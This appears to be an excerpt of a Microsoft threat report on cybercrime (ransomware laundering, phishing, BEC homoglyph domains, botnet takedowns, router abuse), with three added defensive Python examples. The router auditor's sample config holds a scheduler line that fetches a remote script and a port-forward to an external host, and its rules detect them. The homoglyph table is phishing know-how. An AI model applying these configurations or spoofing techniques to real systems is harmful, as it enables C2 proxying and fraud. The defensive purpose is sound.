Criminal use of cryptocurrencies

As the adoption of cryptocurrency becomes mainstream, criminals are increasingly using it to evade law enforcement and anti-money laundering (AML) measures. This heightens the challenge for law enforcement to track and trace cryptocurrency payments to cybercriminals. Worldwide spending on blockchain solutions grew by approximately 340% over the last four years, while new cryptocurrency wallets grew by around 270%. There are more than 83 million unique wallets globally, and the total market capitalisation of all cryptocurrencies was approximately USD 1.1 trillion as of July 28, 2022.10

Tracking ransomware payments

Ransomware is one of the largest sources of illicitly gained cryptocurrency. In an effort to disrupt malicious technical infrastructure used in ransomware attacks – for example, the disruption of Zloader in April 202211 – Microsoft’s DCU tracks criminal wallets to enable cryptocurrency tracking and recovery capabilities. DCU investigators have observed ransomware actors evolving their communication tactics with victims to conceal the money trail. Originally, cybercriminals included Bitcoin addresses in their ransom notes. However, this made it easy to follow payment transactions on the blockchain, so ransomware actors stopped including wallet addresses and instead appended email addresses or links to chat websites to communicate ransom payment addresses to victims. Some actors even created unique webpages and logins for each victim to prevent security researchers and law enforcement from obtaining the criminals’ wallet addresses by pretending to be victims. Despite criminals’ efforts to hide their tracks, some ransom payments can still be recovered by working with law enforcement and crypto analysis companies that can track movement on the blockchain.

Trending: DEX laundering of illicit proceeds

A key issue for cybercriminals is the conversion of cryptocurrency to fiat currency. Cybercriminals have several potential avenues for conversion, each of which carries a different degree of risk. One method used to reduce risk is to launder proceeds through a decentralised exchange (DEX) before cashing out via available cash-out options, such as centralised exchanges (CEX), peer-to-peer (P2P) and over the counter (OTC) exchanges. DEXs are an attractive laundering location because they often do not follow AML measures.

In December 2021, hackers attacked the global cryptocurrency trading platform AscendEx and stole approximately USD 77.7 million in cryptocurrency belonging to its customers.12 AscendEx hired blockchain analytics firms and contacted other CEXs so the wallets receiving stolen funds could be blacklisted. Additionally, addresses where the coins were sent were labelled as such on the Ethereum blockchain explorer Etherscan.13 In order to circumvent the alerting and blacklisting, the hackers sent USD 1.5 million in Ethereum to Uniswap, one of the world’s largest DEXs, on February 18, 2022.14

The adoption of stronger AML measures by DEXs could blunt laundering activity on their platforms and force cybercriminals to use other obfuscation methods like coin tumbling or unlicensed exchanges. As an example, Uniswap recently announced it will start to use blacklists to block wallets known to be involved in illicit activities from transacting on the exchange.15

[Figure: Tracking illicitly gained cryptocurrency. Nodes: AscendEX.com stolen funds (11-12-2021), Uniswap V3, Curve; edge labels 72.19 ETH and 46.77 ETH.] Source: Twitter.com – @PeckShieldAlert (PeckShield is a China-based blockchain security company). Using the cryptocurrency investigative tool Chainalysis, Microsoft’s Digital Crimes Unit discovered the AscendEX hackers swapped their stolen funds at a smaller DEX called Curve in addition to Uniswap. This diagram illustrates the laundering routes the team uncovered. Each circle represents a cluster of wallets and the numbers on each line represent the total amount of Ethereum transmitted for laundering purposes.

Actionable insights
1. If you are a victim of cybercrime who has paid the criminal using cryptocurrency, contact local law enforcement, who might be able to help track and recover lost funds.
2. Become familiar with the AML measures in place when selecting a DEX.

Links to further information
Hardware-based threat defence against increasingly complex cryptojackers | Microsoft 365 Defender Research Team
The evolving phishing threat landscape

Credential phishing schemes are on the rise and remain a substantial threat to users everywhere because they indiscriminately target all inboxes. Among the threats our researchers track and protect against, the volume of phishing attacks is orders of magnitude greater than all other threats.

Microsoft 365 credentials remain one of the most highly sought-after account types for attackers. Once login credentials are compromised, attackers can log in to corporate-tied computer systems to facilitate infection with malware and ransomware, steal confidential company data and information by accessing SharePoint files, and continue the spread of phish by sending additional malicious emails using Outlook, among other actions.

In addition to campaigns with broader targets, phishing for credentials, donations and personal information, attackers are targeting selected businesses for larger payouts. Email phishing attacks against businesses for financial gain are collectively referred to as business email compromise (BEC) attacks. Microsoft detects millions of BEC emails every month, equivalent to 0.6% of all phishing emails observed. A report from IC3 [18] published in May 2022 indicates an upward trend in exposed losses due to BEC attacks.

The techniques used in phishing attacks continue to increase in complexity. In response to countermeasures, attackers adapt new ways to implement their techniques and increase the complexity of how and where they host campaign operation infrastructure. This means organisations must regularly reassess their strategy for implementing security solutions to block malicious emails and strengthen access control for individual user accounts.

How these metrics are measured: using data from Defender for Office, we see malicious email and compromised identity activity. Azure Active Directory Identity Protection provides still more information through compromised identity event alerts. Using Defender for Cloud Apps, we see compromised identity data access events, and Microsoft 365 Defender (M365D) provides cross-product correlation. The lateral movement metric comes from Defender for Endpoint (attack behaviour alerts and events), Defender for Office (malicious email) and again M365D for cross-product correlation.

Key figures
710 million phishing emails blocked per week.
531,000: in addition to the URLs blocked by Defender for Office, our Digital Crimes Unit directed the takedown of 531,000 unique phishing URLs hosted outside of Microsoft.
1 hr 12 m: the median time it takes for an attacker to access your private data if you fall victim to a phishing email. [16]
1 hr 42 m: the median time for an attacker to begin moving laterally within your corporate network once a device is compromised. [17]

[Chart: Detected phish emails per week, in millions (0 to 900), July 2021 to June 2022. Source: Exchange Online Protection signals.] The number of phish detections per week continues to rise. The decrease in December-January is an expected seasonal drop, also reported in last year’s report.
More than ever, phishers are relying on legitimate infrastructure to operate, driving a rise in phishing campaigns aimed at compromising various parts of an existing operation so they do not have to purchase, host or operate their own. For example, malicious emails might originate from compromised sender accounts. Attackers benefit from using these email addresses, which have a higher reputation score and are seen as more trustworthy than newly created accounts and domains. In some more advanced phishing campaigns, we observed attackers preferring to send and spoof from domains whose DMARC [19] record is set up incorrectly with a ‘no action’ (p=none) policy, which opens the door for email spoofing because receivers report authentication failures but still deliver the mail.

We continue to observe a steady year-over-year increase in phishing emails. The shift to remote work in 2020 and 2021 saw a substantial increase in phishing attacks aiming to capitalise on the changing work environment. Phish operators are quick to adopt new email templates using lures aligned with major world events such as the COVID-19 pandemic and themes linked to collaboration and productivity tools such as Google Drive or OneDrive file sharing.

While COVID-19 themes have diminished, the war in Ukraine became a new lure starting in early March 2022. Our researchers observed a staggering increase in emails impersonating legitimate organisations soliciting cryptocurrency donations in Bitcoin and Ethereum, allegedly to support Ukrainian citizens. Only a few days after the start of the war in Ukraine in late February 2022, the number of detected phishing emails containing Ethereum addresses encountered across enterprise customers increased dramatically. Total encounters peaked in the first week of March, when half a million phishing emails contained an Ethereum wallet address. Prior to the start of the war, the number of Ethereum wallet addresses across other emails detected as phish was significantly lower, averaging a few thousand emails per day.
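The ‘no action’ DMARC weakness described above is a property of a single DNS TXT record, so it can be checked mechanically. The following is an added example, not code from the Microsoft report: it parses DMARC records in the tag=value syntax of RFC 7489, classifies them as missing, monitor-only, partial or enforcing, and predicts what an enforcing receiver does with an unauthenticated message. The records and the reserved example domain names are constructed for the example; no DNS lookups are performed, and the pct= sampling a real receiver applies is not simulated.

```python
"""Classify a DMARC record and predict the receiver's action on a spoofed message.

Added example; not from the Microsoft Digital Defence Report. Records below are
constructed and would live at _dmarc.<domain>; nothing is resolved.
Tag semantics follow RFC 7489: p= is the domain policy, sp= the subdomain policy
(defaults to p), pct= the share of failing mail the policy applies to (default 100).
"""

SAMPLE_RECORDS = {
    # constructed: the 'no action' case the text describes
    "monitor-only.example": "v=DMARC1; p=none; rua=mailto:dmarc@monitor-only.example",
    # constructed: enforcement switched on for only a tenth of failing mail
    "partial.example": "v=DMARC1; p=quarantine; pct=10; rua=mailto:dmarc@partial.example",
    # constructed: organisational domain enforced, subdomains left open
    "subdomain-gap.example": "v=DMARC1; p=reject; sp=none; rua=mailto:dmarc@subdomain-gap.example",
    # constructed: fully enforcing with strict alignment
    "hardened.example": "v=DMARC1; p=reject; sp=reject; adkim=s; aspf=s; rua=mailto:dmarc@hardened.example",
    # constructed: no record published
    "absent.example": "",
}


def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict keyed by lower-cased tag name."""
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: str):
    """Return (verdict, findings). Verdict: missing, monitor-only, partial or enforcing."""
    if not record.strip():
        return "missing", ["no record: receivers have no policy to apply to spoofed mail"]
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return "missing", ["record does not start with v=DMARC1 and will be ignored"]
    policy = tags.get("p", "none").lower()
    subpolicy = tags.get("sp", policy).lower()
    pct = int(tags.get("pct", "100"))
    findings = []
    if policy == "none":
        findings.append("p=none: authentication failures are reported but still delivered")
        verdict = "monitor-only"
    else:
        verdict = "enforcing"
        if pct < 100:
            findings.append(f"pct={pct}: only {pct}% of failing mail gets the {policy} policy")
            verdict = "partial"
        if subpolicy == "none":
            findings.append("sp=none: mail from any subdomain can still be spoofed")
            verdict = "partial"
    if "rua" not in tags:
        findings.append("no rua=: no aggregate reports, so abuse of the domain goes unnoticed")
    return verdict, findings


def receiver_action(record: str, dkim_aligned: bool, spf_aligned: bool,
                    from_subdomain: bool = False) -> str:
    """What a DMARC-enforcing receiver does: deliver, quarantine or reject.

    A message passes DMARC when either DKIM or SPF passes with an aligned domain;
    only failing messages are subject to the published policy.
    """
    if dkim_aligned or spf_aligned:
        return "deliver"
    tags = parse_dmarc(record) if record.strip() else {}
    if tags.get("v", "").upper() != "DMARC1":
        return "deliver"  # no usable policy: receiver falls back to its own heuristics
    policy = tags.get("p", "none").lower()
    if from_subdomain:
        policy = tags.get("sp", policy).lower()
    return {"quarantine": "quarantine", "reject": "reject"}.get(policy, "deliver")


if __name__ == "__main__":
    for domain, record in SAMPLE_RECORDS.items():
        verdict, findings = assess_dmarc(record)
        print(f"{domain}: {verdict}")
        for f in findings:
            print(f"  - {f}")
```

A domain that reports as monitor-only is exactly the kind of sender the campaigns above prefer to spoof: every receiver that honours DMARC will deliver the forged mail and merely send the owner an aggregate report. Moving to p=reject (and sp=reject) is what turns the record into a control rather than a telemetry feed.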
Large phish operations tend to use cloud services and cloud virtual machines (VMs) to operationalise large scale attacks. Attackers can fully automate the process of deploying and delivering emails from VMs using SMTP email relays or cloud email infrastructure to benefit from the high deliverability rates and positive reputation of these legitimate services. If malicious email is allowed to be sent through these cloud services, defenders must rely on strong email filtering capabilities to block emails from entering their environment.

Microsoft accounts remain a top target for phishing operators, as evidenced by the numerous phishing landing pages which impersonate the Microsoft 365 login page. For example, phishers attempt to match the Microsoft login experience in their phish kits by generating a unique URL customised to the recipient. This URL points to a malicious webpage developed to harvest credentials, but a parameter in the URL will contain the specific recipient’s email address. Once the target navigates to the page, the phish kit will pre-populate user login data and a corporate logo customised to the email recipient, mirroring the appearance of the targeted company’s custom Microsoft 365 login page.

[Figure: Phishing page impersonating a Microsoft login with dynamic content.]

[Chart: Phishing emails with Ethereum wallet addresses, in thousands (0 to 600), July 2021 to June 2022.] Total emails detected as phish containing Ethereum wallet addresses increased at the start of the Ukraine-Russia conflict and tapered off after the initial push.
Defending against phish
To reduce your organisation’s exposure to phish, IT administrators are encouraged to implement the following policies and features:
1 Require the use of MFA across all accounts to limit unauthorised access.
2 Enable conditional access features for highly privileged accounts to block access from countries, regions and IPs that do not typically generate traffic at your organisation.
3 Consider using physical security keys for executives, employees involved in payment or purchase activities and other privileged accounts.
4 Enforce the use of browsers which support services such as Microsoft SmartScreen to analyse URLs for suspicious behaviour and block access to known malicious websites. [23]
5 Use a machine-learning based security solution that quarantines high probability phish and detonates URLs and attachments in a sandbox before email reaches the inbox, such as Microsoft Defender for Office 365. [24]
6 Enable impersonation and spoofing protection features across your organisation.
7 Configure DomainKeys Identified Mail (DKIM) and Domain-based Message Authentication, Reporting and Conformance (DMARC) action policies to prevent delivery of non-authenticated emails that might be spoofing reputable senders.
8 Audit tenant and user created allow rules and remove broad domain and IP based exceptions. These rules often take precedence and can allow known malicious emails through email filtering.
9 Regularly run phishing simulators to gauge the potential risk across your organisation and to identify and educate vulnerable users.

Links to further information
From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud | Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Centre (MSTIC)

Spotlight on business email compromise

Cybercriminals are developing increasingly complex schemes and techniques to defeat security settings and target individuals, businesses and organisations. We are investing significant resources to further enhance our BEC enforcement programme in response. BEC is the costliest financial cybercrime, with an estimated USD 2.4 billion in adjusted losses in 2021, representing more than 59% of the top five internet crime losses globally. [20] To understand the scope of the problem and how best to protect users against BEC, Microsoft security researchers have been tracking the most common themes used in attacks.

BEC trends
As a point of entry, BEC attackers normally attempt to start a conversation with potential victims to establish rapport. Posing as a colleague or business acquaintance, the attacker gradually leads the conversation in the direction of a monetary transfer. The introduction email, which we track as a BEC lure, represents close to 80% of detected BEC emails. Other trends identified by Microsoft security researchers over the past year include:
• The most frequently used techniques in BEC attacks observed in 2022 were spoofing [21] and impersonation. [22]
• The BEC subtype causing the most financial damage to victims was invoice fraud (based on volume and requested dollar amounts seen in our BEC campaign investigations).
• Theft of business information such as accounts payable reports and customer contacts enables attackers to craft convincing invoice fraud.
• Most payroll redirection requests were sent from free email services and seldom from compromised accounts. Email volume from these sources spiked around the first and fifteenth of each month, the most common pay dates.
• Despite being well-known avenues for fraud, gift card scams comprised only 1.9% of the BEC attacks detected.

BEC themes by percentage of occurrence (January-June 2022)
BEC lure               79.9%
Invoice fraud           9.3%
Payroll redirection     4.6%
Business information    4.3%
Gift card scam          1.9%
Homoglyph deception

BEC and phishing are common social engineering tactics. Social engineering plays a significant role in crime, persuading a target to interact with the criminal by gaining trust. In physical commerce, trademarks are used to secure trust in the origin of a product or service, and counterfeit products are an abuse of the trademark. Similarly, cybercriminals pose as a contact familiar to the target during a phishing attack, using homoglyphs to deceive potential victims. In BEC, a homoglyph domain is a domain name used for email in which one or more characters are replaced by characters that are identical or nearly identical in appearance, in order to deceive the target.

BEC generally has two phases, the first of which involves compromise of credentials. These credential leaks can be the result of phishing attacks or large data breaches. The credentials are then sold or traded on the dark web. The second phase is the fraud phase, where attackers use compromised credentials to engage in sophisticated social engineering using homoglyph email domains.

Homoglyph techniques used in BEC attempts
Analysis of over 1,700 homoglyph domains between January and July 2022. While 170 homoglyph techniques were used, 75% of domains used just the 14 techniques below.

Technique                         % of domains showing technique
sub l for I                       25%
sub i for l                       12%
sub q for g                        7%
sub rn for m                       6%
sub .cam for .com                  6%
sub 0 for o                        5%
sub ll for l                       3%
sub ii for i                       2%
sub vv for w                       2%
sub l for ll                       2%
sub e for a                        2%
sub nn for m                       1%
sub ll for I, sub l for i          1%
sub o for u                        1%

A homoglyph in action
A homoglyph domain that looks identical to a mail domain the victim recognises is registered with a mail provider, together with a username identical to the genuine sender’s. A copied email thread is then sent from that look-alike domain with new payment instructions.

Progression of a BEC attack
Leveraging open-source intelligence and access to email threads, the criminal identifies individuals who have responsibility for invoicing and payments. They then create an impersonation of the email address of the individual sending invoices. This impersonation is composed of an identical username and a mail domain that is a homoglyph of the genuine sender’s. The attacker copies an email chain containing a legitimate invoice, then changes the invoice to contain their own bank details. This new, modified invoice is then resent from the homoglyph impersonation address to the target. Because the context makes sense and the email looks genuine, the target often follows the fraudulent instructions.

Actionable insights
1 Enforce the use of browsers that support services such as Safe Links and SmartScreen to analyse URLs for suspicious behaviour and block access to known malicious websites. [25]
2 Use a machine-learning based security solution that quarantines high probability phish and detonates URLs and attachments in a sandbox before email reaches the inbox.

Links to further information
Internet Crime Complaint Centre (IC3) | Business Email Compromise: The USD 43 Billion Scam
Spoof intelligence insight – Office 365 | Microsoft Docs
Impersonation insight – Office 365 | Microsoft Docs
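The substitution table above is small enough to turn into a mail-gateway triage check. The following is an added example, not code from the Microsoft report: it folds every domain into a canonical spelling in which the tabulated confusable pairs (l/I/i/1, q/g, rn/m, nn/m, vv/w, 0/o, u/o, e/a, doubled l or i, and the .cam/.com TLD swap) collapse together, then reports a sender as a homoglyph when its folded form equals that of a trusted domain while the raw strings differ. The trusted list and sample sender addresses are constructed; Unicode (IDN) look-alikes and characters outside the table are out of scope. The fold is deliberately lossy, so a hit is a triage signal for an analyst, not a block decision on its own.

```python
"""Flag sender domains that are ASCII homoglyphs of domains the organisation trusts.

Added example; not from the Microsoft Digital Defence Report. Trusted domains
and sample addresses are constructed. The fold is lossy by design: it only has
to map a look-alike and its genuine counterpart to the same string.
"""
import re

TRUSTED_DOMAINS = {"contoso.com", "fabrikam.com"}  # constructed allow list

# Single-character confusables from the table. Domains are case-insensitive, so
# capital I has already become i by the time this runs; i, l and 1 share a class.
_CHAR_FOLD = str.maketrans({"i": "l", "1": "l", "q": "g", "0": "o", "u": "o", "e": "a"})

# Multi-character confusables; applied before the single-character map so that
# 'rn' is read as a unit rather than as 'r' followed by 'n'.
_PAIR_FOLD = (("rn", "m"), ("nn", "m"), ("vv", "w"))


def fold(domain: str) -> str:
    """Canonical spelling of a domain under the homoglyph substitutions."""
    d = domain.strip().lower().rstrip(".")
    if d.endswith(".cam"):          # '.cam for .com' substitution
        d = d[:-4] + ".com"
    for pair, single in _PAIR_FOLD:
        d = d.replace(pair, single)
    d = d.translate(_CHAR_FOLD)
    # 'll for l', 'l for ll' and, after i->l, 'ii for i' all collapse to one l.
    return re.sub(r"l{2,}", "l", d)


_FOLDED_TRUSTED = {fold(t): t for t in TRUSTED_DOMAINS}


def impersonated_domain(sender_domain: str):
    """Return the trusted domain that sender_domain imitates, or None."""
    if sender_domain.strip().lower().rstrip(".") in TRUSTED_DOMAINS:
        return None                 # the genuine domain is not a homoglyph of itself
    return _FOLDED_TRUSTED.get(fold(sender_domain))


def triage(from_addresses):
    """Return [(address, impersonated trusted domain)] for suspicious senders."""
    hits = []
    for addr in from_addresses:
        _, _, domain = addr.rpartition("@")
        target = impersonated_domain(domain)
        if target:
            hits.append((addr, target))
    return hits


if __name__ == "__main__":
    # constructed From: addresses, one genuine, three look-alikes, one unrelated
    sample = ["ap@contoso.com", "ap@c0ntoso.cam", "ap@fabrikarn.com",
              "ap@fabrlkam.com", "ap@northwind.com"]
    for addr, target in triage(sample):
        print(f"{addr} looks like {target}")
```

Because the check runs on the domain rather than the display name, it catches the ‘identical username, homoglyph domain’ construction described above even when the local part is perfect. Pair it with the impersonation and spoof intelligence insights linked above rather than using it alone.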
A timeline of botnet disruption from Microsoft’s early days of collaboration

For more than a decade, DCU has worked to proactively stop cybercrime, resulting in 26 malware and nation state disruptions. As the DCU team uses more advanced tactics and tools to shut down these illicit operations, we see the cybercriminals also evolve their approaches in an attempt to stay a step ahead. Here is a timeline showing a sample of the botnets disrupted by DCU and the strategies Microsoft adopted to shut them down (timeline labels: 2008, 2009, 2011, 2013, 2019, 2022).

2008: Microsoft Digital Crimes Unit is formed
Collaboration: Designed to thwart cybercrime impacting the Microsoft ecosystem through close integration across a team of investigators, lawyers and engineers.
Microsoft approach: The goal is to better understand the technical aspects of various malware and provide these insights to Microsoft’s legal team to develop an effective disruption strategy.

2009: Conficker botnet
Description: A fast-spreading worm targeting the Windows OS, infecting millions of computers and devices in a common network; created network outages worldwide.
Collaboration: Formation of the Conficker Working Group, the first consortium of its kind. Microsoft partnered with 16 organisations across the globe to defeat the bot.
Microsoft response: The group collaborated across many international jurisdictions and succeeded in bringing Conficker down.

Waledac botnet
Description: A complex spam botnet with US domains that collected email addresses and distributed spam; it infected up to 90,000 computers across the world. [26]
Collaboration: Creation of another consortium, the Microsoft Malware Protection Centre (MMPC), with a focus on close collaboration with academics. [27]
Microsoft response: Microsoft used a tiered disruption approach against the C2 and surprised the bad actors by seizing US-based domains without notice. [28] Microsoft was granted temporary ownership of nearly 280 domains used by Waledac’s servers.

2011: Rustock botnet
Description: A backdoor trojan spam email bot using internet providers as primary C2s; designed to sell pharmaceuticals.
Collaboration: Microsoft forged a partnership with Pfizer Pharmaceuticals to understand the drugs sold by Rustock and worked closely with Dutch law enforcement officials. [29]
Microsoft response: Microsoft worked with US Marshals and law enforcement in the Netherlands to take down the C2 servers in that country, and registered and blocked all future domains produced by the botnet’s domain generation algorithm (DGA).

2013: Sirefef/ZeroAccess botnet
Description: An advertising botnet designed to direct people to dangerous websites that would install malware or steal personal information; infected more than two million computers and cost advertisers more than USD 2.7 million per month; primarily in the US and Western Europe.
Collaboration: Worked closely with the FBI and Europol’s Cybercrime Centre to bring down the peer-to-peer infrastructure.
Microsoft response: Joined the ZeroAccess network, replaced the criminal C2 servers and successfully seized download server domains.

Trickbot botnet
Description: A sophisticated botnet with fragmented infrastructure across the globe that targeted the financial services industry; it also compromised IoT devices.
Collaboration: Microsoft partnered with the Financial Services Information Sharing and Analysis Centre (FS-ISAC) to bring down Trickbot. [30]
Microsoft response: DCU built a system to identify and track bot infrastructure and generated notifications for active internet providers, taking into account specific laws in various countries.

2022: Continued focus on disruption
Description: Microsoft disrupted the infrastructure of seven threat actors over the past year, preventing them from distributing additional malware, controlling victims’ computers and targeting additional victims.
Collaboration: In partnership with internet service providers, governments, law enforcement and private industry, Microsoft shared information to remediate over 17 million malware victims worldwide.

Looking ahead
DCU continues to innovate and is looking to use its experience in botnet disruptions to conduct coordinated operations that go beyond malware. Our continued success requires creative engineering, sharing of information, innovative legal theories and public and private partnerships.
Cybercriminal abuse of infrastructure

Internet gateways as criminal command and control infrastructure

IoT devices are becoming an increasingly popular target for cybercriminals using widespread botnets. When routers are unpatched and left exposed directly to the internet, threat actors can abuse them to gain access to networks, execute malicious attacks and even support their operations. The Microsoft Defender for IoT team conducts research on equipment ranging from legacy industrial control system controllers to cutting-edge IoT sensors. The team investigates IoT- and OT-specific malware to contribute to the shared list of indicators of compromise.

Routers are particularly vulnerable attack vectors because they are ubiquitous across internet-connected homes and organisations. We have been tracking the activity of MikroTik routers, a popular router around the world residentially and commercially, identifying how they are utilised for command and control (C2), domain name system (DNS) attacks and crypto mining hijacking. More specifically, we identified how Trickbot operators utilise compromised MikroTik routers and reconfigure them to act as part of their C2 infrastructure. The popularity of these devices compounds the severity of their abuse by Trickbot, and their unique hardware and software enable threat actors to evade traditional security measures, expand their infrastructure and compromise more devices and networks.

Exposed routers are at risk of having potential vulnerabilities exploited. By tracking and analysing traffic containing secure shell (SSH) commands, we observed attackers using MikroTik routers to communicate with Trickbot infrastructure after obtaining legitimate credentials to devices. These credentials can be obtained through brute force attacks, exploiting known vulnerabilities with readily available patches and using default passwords. Once a device is accessed, the attacker issues a unique command that redirects traffic between two ports in the router, establishing the line of communication between Trickbot-affected devices and the C2.

We have aggregated our knowledge of the various methods of attacking MikroTik devices, beyond just Trickbot, as well as known common vulnerabilities and exposures (CVEs), into an open-source tool for MikroTik devices which can extract the forensic artifacts related to attacks on these devices. [31]

Devices acting as reverse proxies for malware C2 are not unique to Trickbot and MikroTik routers. In collaboration with the Microsoft RiskIQ team, we traced back to the C2 involved and, through observing SSL certificates, identified Ubiquiti and LigoWave devices that are impacted as well. [32] This is a strong indication that IoT devices are becoming active components of nation state coordinated attacks and a popular target for cybercriminals using widespread botnets.

Trickbot attack chain showing the use of MikroTik IoT devices as proxy servers for C2:
1 The attacker sets up malicious domains and command and control.
2 Installs Trickbot on the target network via a campaign.
3 Performs reconnaissance to obtain network information.
4 Scans for MikroTik devices that are exposed to the internet.
5 Steals device credentials and maintains persistence on the compromised IoT device.
6 Executes the traffic redirection command on the router.
7 Communicates with C2 via the router; drops payloads and steals information from the target network.

93,868 exposed MikroTik routers were identified. [Map: distribution of exposed MikroTik routers around the world.]
Virtual machines as criminal infrastructure

The widespread move to the cloud includes cybercriminals, who leverage the private assets of unwitting victims obtained through phishing or by distributing credential-stealing malware. Many cybercriminals are choosing to set up their malicious infrastructure on cloud-based virtual machines (VMs), containers and microservices. Once the cybercriminal has access, a sequence of events can occur to set up infrastructure, such as a series of virtual machines created through scripting and automated processes. These scripted, automated processes are used to launch malicious activity including large scale email spam attacks, phishing attacks and web pages hosting nefarious content. It can even include setting up a scaled virtual environment to carry out cryptocurrency mining, leaving the end victim with a bill of hundreds of thousands of dollars at the end of the month.

Cybercriminals understand their malicious activity has a limited life span before it is detected and shut down. As a result, they have scaled up and now operate proactively with contingencies top of mind. They have been observed preparing compromised accounts ahead of time and monitoring their environments. As soon as an account (set up using hundreds of thousands of virtual machines) is detected, they traverse to the next account, already prepared by scripts to be immediately activated, and their malicious activity continues with little to no interruption.

Like cloud infrastructure, on-premises infrastructure can be used in attacks with virtual local environments that are unknown to the on-premises user. This requires the initial access point to remain open and accessible. On-premises private assets have also been abused by cybercriminals to initiate an onward chain of cloud infrastructure, set up to obfuscate their origin and avoid detection of suspicious infrastructure creation.

Crypto criminals abusing IoT devices

Gateway devices are an increasingly valuable target for threat actors as the number of known vulnerabilities has grown consistently from year to year. They are being used for crypto mining and other types of malicious activity. As cryptocurrency has become more popular, many individuals and organisations have invested computational power and network resources from devices such as routers to mine coins on the blockchain. However, mining cryptocurrency is a time- and resource-intensive process with a low probability of success. To increase the likelihood of mining a coin, miners pool together in distributed, cooperative networks and receive a share of each mined coin in proportion to the hashing power their connected resources contribute.

In the past year, Microsoft observed a growing number of attacks that abuse routers to redirect cryptocurrency mining. Cybercriminals compromise routers connected to mining pools and redirect mining traffic to their own IP addresses with DNS poisoning, altering the DNS settings of the targeted devices. Affected routers resolve the pool’s domain name to the wrong IP address, sending their mining resources, or hashes, to pools used by threat actors. These pools might mine anonymous coins associated with criminal activities or use the legitimate hashes generated by miners to acquire a percentage of the coin that they mined, thus reaping the rewards.

With more than half of known vulnerabilities found in 2021 lacking a patch, updating and securing routers on corporate and private networks remains a significant challenge for device owners and administrators.

[Figure: Compromising devices for illegal crypto mining. Miners and ASIC miners reach a mining pool through their routers; DNS poisoning of the routers diverts them to the criminal’s pool. A portion of hashes from the original pool is stolen by threat actors, or resources are transferred to their pool, or the routers carry malware that steals resources for mining.] DNS poisoning of gateway devices compromises legitimate mining activities and redirects resources to criminal mining activities.

Actionable insights
1 Implement good cyber hygiene and provide cybersecurity training for employees, with guidance on avoiding social engineering.
2 Conduct regular automated user activity anomaly checks through detections at scale to help reduce these types of attacks.
3 Update and secure routers on corporate and private networks.
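Both abuses of gateway devices described above, the port-redirection command that turns a MikroTik router into a Trickbot C2 proxy and the DNS poisoning that diverts mining-pool traffic, leave traces in the router’s configuration. The following is an added example, not Microsoft’s open-source MikroTik forensic tool and not code from the report: it parses the text form of a RouterOS ‘/export’ (menu path lines followed by add/set commands with key=value tokens) and flags dst-nat rules that forward a port to a non-private address, upstream resolvers outside an allow list, static DNS overrides, an exposed resolver setting, and scheduler jobs that fetch scripts over plain HTTP. The export, the allow list, the addresses (documentation ranges) and the port numbers are all constructed for the example.

```python
"""Audit a MikroTik RouterOS '/export' for C2-proxy and DNS-poisoning artefacts.

Added example; not the open-source tool the report refers to and not Microsoft
code. Sample export and allow list are constructed. Documentation ranges
(198.51.100.0/24, 203.0.113.0/24) are deliberately treated as external so the
sample behaves like a device pointed at real public infrastructure.
"""
import ipaddress
import shlex

SAMPLE_EXPORT = """\
# constructed sample export, not a real device
/ip firewall nat
add chain=srcnat action=masquerade out-interface=ether1
add chain=dstnat action=dst-nat protocol=tcp dst-port=449 to-addresses=198.51.100.23 to-ports=80
add chain=dstnat action=dst-nat protocol=tcp dst-port=8080 to-addresses=192.168.88.10 to-ports=80
/ip dns
set servers=203.0.113.53 allow-remote-requests=yes
/ip dns static
add name=pool.example-mining.test address=203.0.113.9
/system scheduler
add name=upd interval=1d on-event="/tool fetch url=http://203.0.113.77/x.rsc"
"""

APPROVED_RESOLVERS = {"192.168.88.1", "1.1.1.1"}  # constructed allow list

_INTERNAL = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def parse_export(text):
    """Yield (menu, verb, {key: value}) for every add/set line in an export."""
    menu = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            menu = line                     # e.g. '/ip firewall nat'
            continue
        tokens = shlex.split(line)          # honours quoted values with spaces
        verb, kv = tokens[0], {}
        for tok in tokens[1:]:
            key, sep, value = tok.partition("=")
            if sep:
                kv[key] = value
        yield menu, verb, kv


def _is_external(addr):
    """True for any routable address outside RFC 1918, loopback and link-local."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return not any(ip in net for net in _INTERNAL)


def audit(text):
    """Return [(severity, message)] for the patterns described in the text."""
    findings = []
    for menu, verb, kv in parse_export(text):
        if menu == "/ip firewall nat" and kv.get("chain") == "dstnat" and kv.get("action") == "dst-nat":
            target = kv.get("to-addresses", "")
            if _is_external(target):        # port forwarded out to a remote host: proxy/C2 pattern
                findings.append(("high", f"dst-nat forwards port {kv.get('dst-port')} to external host "
                                         f"{target}:{kv.get('to-ports')}"))
        elif menu == "/ip dns" and verb == "set":
            for srv in kv.get("servers", "").split(","):
                if srv and srv not in APPROVED_RESOLVERS:
                    findings.append(("medium", f"unapproved upstream resolver {srv}"))
            if kv.get("allow-remote-requests") == "yes":
                findings.append(("medium", "allow-remote-requests=yes: resolver answers on every "
                                           "interface, exposed if the WAN side is unfiltered"))
        elif menu == "/ip dns static":      # any override of a public name deserves review
            findings.append(("medium", f"static DNS override: {kv.get('name')} -> {kv.get('address')}"))
        elif menu == "/system scheduler" and "http://" in kv.get("on-event", ""):
            findings.append(("high", f"scheduler '{kv.get('name')}' fetches a script over plain HTTP"))
    return findings


if __name__ == "__main__":
    for severity, message in audit(SAMPLE_EXPORT):
        print(f"[{severity}] {message}")
```

Run it against a fresh ‘/export’ pulled over SSH from each gateway; the dst-nat finding is the one to treat as an incident, because a router has no legitimate reason to forward an inbound port to a host it does not own. The static DNS and resolver findings are review items: a single poisoned entry for a pool hostname is exactly the mechanism in the figure above.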